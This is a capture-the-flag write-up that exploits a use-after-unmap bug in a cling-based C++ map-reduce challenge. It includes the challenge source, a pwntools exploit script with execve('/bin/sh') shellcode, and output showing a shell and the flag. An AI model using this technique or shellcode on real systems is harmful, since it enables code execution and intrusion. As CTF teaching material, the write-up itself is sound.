I’m happy to announce that our new map-reduce service is now running on the rigid and flexible platform.

nc 30003

Attachment: cling.tar.gz

Team: Super Guesser

1. create
2. protect
3. delete
4. set_map
5. run_map
6. set_reduce
7. run_reduce
8. show_result

This challenge was using cling, which is an “interactive C++ Interpreter”. We were provided the source of the code, that will be passed to the interpreter.

Options 6-8 were not implemented, so let’s take a quick look at the other options.

void create() {
    if (n_create > N_CREATE) {
        puts("too many creation");
    printf("size? >");
    unsigned size = get_num();
    if (0 == size || size > (0x1000/sizeof(unsigned long long))) {
        puts("too big");
    buf = (unsigned long long *)mmap(NULL, 0x1000 , PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    n_elem = size;
    if ((long long int)buf == -1) {
        n_elem = 0;
        buf = NULL;
    printf("%p\n", buf);

    for (int i = 0; i < n_elem; i++) {
        if (scanf("%llu", &buf[i]) != 1) return;

Create will just pretty much mmap a region with read/write permissions and stores a pointer to it in a global buf variable.

void protect() {
    u64 prot = PROT_NONE;
    printf("read? >");
    if (get_yes_no()) {
        puts("yes read");
        prot |= PROT_READ;
    printf("write? >");
    if (get_yes_no()) {
        prot |= PROT_WRITE;
    printf("exec? >");
    if (get_yes_no()) {
        prot |= PROT_EXEC;
    int ret = mprotect(buf, 0x1000, prot);
    if (ret == -1) {
        n_elem = 0;
        buf = NULL;

protect lets us define the permissions on the mmapped region. Answering all questions with yes will mark it as rwx.

void del() {
    int ret = munmap(buf, 0x1000);
    if (ret == -1) {
        n_elem = 0;
        buf = NULL;

del will munmap our current region, without clearing the global buf pointer. So the address from this will still be available. Normally, this would not be of much use, since that memory region becomes unmapped. But let’s keep this in mind.

void set_map() {
    char expr[8192];
    char func[8492];
    if (!func_set) {
        printf("Give me your map function body > ");
        scanf("%8191s", expr);
        for (int i = 0; i < strlen(expr); i++) {
            if (expr[i] == 'x' ||
                    ('0' <= expr[i] && expr[i] <= '9') ||
                    expr[i] == ' ' ||
                    expr[i] == '+' ||
                    expr[i] == '-' ||
                    expr[i] == '*' ||
                    expr[i] == '/' ||
                    expr[i] == '?' ||
                    expr[i] == ':') continue;
            puts("wrong format");
        sprintf(func, "unsigned long map_func(unsigned long x) {return %s;}", expr);

        cling::Value v;
        auto ret = gCling->evaluate("map_func(42)", v);
        if (ret == 0) {
            printf("map_func(42) = %llu\n", v.getULL());
            func_set = 1;
    } else {
        puts("the map function has already been registered.");

With set_map things get interesting. This will let us enter a map function, which will then be evaluated by the interpreter.

For this cling will kinda do a jit compilation, creating a mmapped region, put the code for this function on it and execute it (marking the region as r-x).

void run_map() {
    char expr[0x2000];
    if (func_set) {
        cling::Value v;
        if (buf == NULL || n_elem == 0) return;
        for (unsigned i = 0; i < n_elem; i++) {
            sprintf(expr, "map_func(%lluULL)", buf[i]);
            gCling->evaluate(expr, v);
            unsigned long long result = v.getULL();
            buf[i] = result;
    } else {
        puts("no map function has been registered yet.");

run_map will now just take some user input and pass it to the map function, we defined in set_map.

So, let’s recap this:

  • We can create a mmapped region via create
  • We can set the permissions for this region via protect
  • We can unmap that region (but keep a pointer to it) via del
  • We can create a custom function, which will mmap a region and put code to it via set_map
  • We can execute this custom function (executing the code from the mmapped region) via run_map
  • Also mmapping a region, unmapping and mmapping it again will serve the same region

See, where this is going? :)

If not, the trick is just to create a mmapped region, fill it up with random values and munmap it. This region will now be gone, but we’ll still have its address in buf.

Now we can call set_map and define a mapping function. Again, it’s content isn’t important, just put something in it, which will compile. This will mmap again a region, put the code for the map function in it and executes it once (and since we created and unmapped a region before, this code will be put into the exact same region which we have in our buf).

Because the region from buf is now mapped again, we can… delete it again… (the map function from set_map will also now point to the same unmapped region).

from pwn import *
import sys

LOCAL = True

HOST = ""
PORT = 30003

def create(size, vals):
    r.sendlineafter(">", str(size))

    for val in vals:

    r.recvuntil("> ")

def setprot(rd, wr, exe):
    r.sendlineafter(">", "y" if rd else "n")
    r.sendlineafter(">", "y" if wr else "n")
    r.sendlineafter(">", "y" if exe else "n")
    r.recvuntil("> ")

def setmap(func):
    r.sendlineafter("> ", func)
    r.recvuntil(" = ")
    resp = r.recvline()[:-1]
    r.recvuntil("> ")
    return resp

def delete():
    r.recvuntil("> ")

def exploit(r):
    r.recvuntil("> ")

    size = 1000/8

    create(size, ["+"])    # create a mmapped region
    delete()               # free it
    setmap("x")            # create map function (will be created in the just freed region)
    delete()               # free the map function region (via buf from create)



if __name__ == "__main__":
    if len(sys.argv) > 1:
        LOCAL = False
        r = remote(HOST, PORT)
        LOCAL = True
        with open("chall.c", "r") as f:
            data =

        r = process(["./cling/bin/cling", "--nologo"])


So, let’s just create again. This will now again serve us the same region as the first create, which is also the same region the map function is pointing to :)

We can now just write proper shellcode to it and then execute the map function via run_map. Since the map function is also pointing to the region, we just defined in create this will then execute our shellcode instead of the previous map function.

The map function will jump to region + 0xa0, so we just have to append some dummy values in the beginning and then write our shellcode to offset 0xa0 in the region

def exploit(r):

    # put shellcode on freed page (compiled map function pointing there)
    SC = """
        xor rax, rax
        mov al, 59
        mov rdi, rdx
        add rdi, 0x28
        xor rsi, rsi
        xor rdx, rdx

    l = []

    context.arch = "amd64"
    payload = asm(SC)
    payload = payload.ljust(40, "\x90")
    payload += "/bin/sh\x00"

    for i in range(0, 0xa0/8):

    for i in range(0, len(payload), 8):
        l.append(str(u64(payload[i:i+8].ljust(8, "\x90"))))

    create(len(l), l)
    setprot(True, True, True)         # make our region rwx

    # execute run_map

run_map will now jump right into our shellcode giving us a shell

[+] Opening connection to on port 30003: Done
[*] Switching to interactive mode
$ ls home/user
$ cat /home/user/flag-26dec3e0f05adecded30266312a10975